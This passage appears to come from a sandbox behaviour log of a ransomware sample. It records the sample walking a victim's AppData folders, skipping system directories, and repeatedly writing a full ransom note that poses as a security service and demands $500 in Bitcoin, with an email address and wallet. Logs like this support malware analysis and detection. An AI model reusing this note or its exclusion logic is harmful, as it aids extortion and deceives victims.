ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.932] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.933] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.933] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.933] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.933] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.933] CloseHandle (hObject=0x150) returned 1 [0089.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.933] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.933] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RESTORE_FILES.txt") returned 107 [0089.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.934] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.934] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.934] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.934] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.935] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.935] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.935] CloseHandle (hObject=0x14c) returned 1 [0089.936] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.936] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.936] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RESTORE_FILES.txt") returned 102 [0089.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.937] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.937] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.937] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.937] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.937] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.938] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.938] CloseHandle (hObject=0xd8) returned 1 [0089.938] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Windows") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Program Files") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Program Files (x86)") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="$Recycle.bin") returned 1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="System Volume Information") returned -1 [0089.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel") returned 65 [0089.938] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0089.938] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0089.938] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned 67 [0089.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\.") returned 67 [0089.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\..") returned 68 [0089.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Windows") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Program Files") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Program Files (x86)") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="System Volume Information") returned 1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 73 [0089.939] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0089.939] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0089.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned 75 [0089.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.") returned 75 [0089.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\..") returned 76 [0089.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.940] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\RESTORE_FILES.txt") returned 91 [0089.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.941] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.941] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.942] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.942] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.942] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.942] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.942] CloseHandle (hObject=0x14c) returned 1 [0089.942] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.942] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RESTORE_FILES.txt") returned 83 [0089.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.944] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.944] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.945] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.945] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.945] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.945] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.945] CloseHandle (hObject=0xd8) returned 1 [0089.945] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0089.945] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12") returned 65 [0089.945] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0089.945] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0089.945] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned 67 [0089.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.946] 